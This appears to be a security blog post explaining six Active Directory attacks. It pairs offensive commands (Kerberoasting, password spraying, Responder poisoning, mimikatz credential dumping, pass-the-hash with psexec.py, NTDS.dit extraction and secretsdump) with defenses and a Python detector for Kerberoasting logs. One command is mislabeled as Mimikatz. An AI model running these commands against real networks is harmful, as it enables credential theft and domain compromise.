Active Directory (AD) remains a prime target for attackers due to its central role in managing identities and access in enterprise environments. Below are key attack methods used against AD, along with practical commands and techniques for both offensive and defensive security.
1. Kerberoasting
Attackers request service tickets for SPNs (Service Principal Names) and crack them offline to extract plaintext passwords.
Commands:
- Extract SPNs:
setspn -T <DOMAIN> -Q */*
- Request tickets & export for cracking:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"
- Extract tickets with Mimikatz:
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath "kerberoast_hashes.txt"
Defense:
- Use strong, complex passwords for service accounts.
- Enable Kerberos AES encryption (disable RC4).
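Added detection example (not code from the original post): Python that scans Windows Security Event ID 4769 records, the log the summary at the end recommends monitoring for Kerberoasting, and flags two things the defenses above target: service tickets issued with RC4 and a single account requesting tickets for many distinct SPNs in a short window. The event records, account names and threshold values are constructed.

```python
"""Flag likely Kerberoasting in Windows Security Event ID 4769 records.
Two signals: a service ticket issued with RC4 (encryption type 0x17/0x18)
for a user service account, and one account requesting many distinct SPNs
in a short window (the bulk pattern of Invoke-Kerberoast-style tooling)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data); keys mirror 4769 fields.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:01", "account": "jdoe", "service": "sqlsvc", "enc": "0x12"},
    {"ts": "2024-05-01T09:00:05", "account": "jdoe", "service": "WEBSRV01$", "enc": "0x17"},
    {"ts": "2024-05-01T09:00:09", "account": "jdoe", "service": "krbtgt", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:00", "account": "mallory", "service": "sqlsvc", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:01", "account": "mallory", "service": "mssql-report", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:02", "account": "mallory", "service": "iis-app", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:03", "account": "mallory", "service": "backupsvc", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:04", "account": "mallory", "service": "sap-svc", "enc": "0x17"},
    {"ts": "2024-05-01T09:10:05", "account": "mallory", "service": "exchangesvc", "enc": "0x17"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP
IGNORED_SERVICES = {"krbtgt"}  # TGT renewals are not Kerberoast targets


def is_roastable(event):
    """True for an RC4 ticket to a user service account. Computer accounts
    (names ending in $) have long random passwords and are skipped."""
    svc = event["service"]
    return (event["enc"].lower() in RC4_ETYPES
            and svc not in IGNORED_SERVICES and not svc.endswith("$"))


def find_rc4_requests(events):
    """All 4769 records where a crackable RC4 service ticket was issued."""
    return [e for e in events if is_roastable(e)]


def find_bulk_spn_requests(events, window=timedelta(minutes=5), threshold=5):
    """Map account -> SPN set for accounts that requested tickets for at
    least `threshold` distinct services inside any `window`-long span."""
    per_account = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        per_account[e["account"]].append((datetime.fromisoformat(e["ts"]), e["service"]))
    flagged = {}
    for account, reqs in per_account.items():
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= threshold:
                flagged[account] = spns
                break
    return flagged
```

The RC4 check alone is noisy in domains that still allow RC4 for legacy services; the bulk-request check is what separates a tool sweep from normal ticket traffic, so tune the window and threshold to the environment.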
2. Password Spraying
Attackers try common passwords across multiple accounts to avoid lockouts.
Commands:
- Using Metasploit:
msfconsole
use auxiliary/scanner/smb/smb_login
set PASS_FILE /path/to/passwords.txt
set USER_FILE /path/to/users.txt
run
- PowerShell Spraying:
Import-Module .\Invoke-DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Password "Spring2024!" -Domain <DOMAIN>
Defense:
- Enforce account lockout policies.
- Monitor failed login attempts.
3. LLMNR/NBT-NS Poisoning
Attackers spoof responses to LLMNR (Link-Local Multicast Name Resolution) requests to capture hashes.
Commands:
- Using Responder:
python Responder.py -I eth0 -wrf
- Capture NTLMv2 hashes for cracking with Hashcat:
hashcat -m 5600 hashes.txt rockyou.txt
Defense:
- Disable LLMNR/NBT-NS in Group Policy.
- Use DNS-based name resolution.
4. Pass-the-Hash (PtH) with Mimikatz
Attackers use NTLM/LM hashes to authenticate without plaintext passwords.
Commands:
- Extract hashes with Mimikatz:
sekurlsa::logonpasswords
- Pass-the-Hash with Impacket:
python psexec.py -hashes <LMHASH:NTHASH> <USER>@<TARGET>
Defense:
- Enable Restricted Admin Mode for RDP.
- Use Credential Guard (Windows 10+).
5. BloodHound Reconnaissance
Attackers map AD attack paths using BloodHound.
Commands:
- Collect data with SharpHound:
.\SharpHound.exe -c All --zipfilename ad_data
- Analyze in BloodHound:
neo4j console
bloodhound
Defense:
- Regularly audit AD permissions.
- Remove excessive privileges.
6. NTDS.dit Extraction
Attackers dump the AD database for offline credential extraction.
Commands:
- Volume Shadow Copy (VSS) method:
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
- Extract hashes with secretsdump.py:
python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Defense:
- Limit Domain Admin access.
- Monitor unusual file access.
What Undercode Say
Active Directory attacks remain prevalent due to misconfigurations and weak credential hygiene. Defenders must:
- Monitor logs (Event ID 4769 for Kerberoasting).
- Enforce LSA Protection (RunAsPPL).
- Disable legacy protocols (NTLM, LM).
- Use Just Enough Admin (JEA) for least privilege.
Expected Output:
Kerberoasting hashes extracted → Cracked with Hashcat. Password spraying detected → Account lockout enforced. LLMNR disabled → NBT-NS attacks mitigated.
Reported By: Cybersecurity News – Hackers Feeds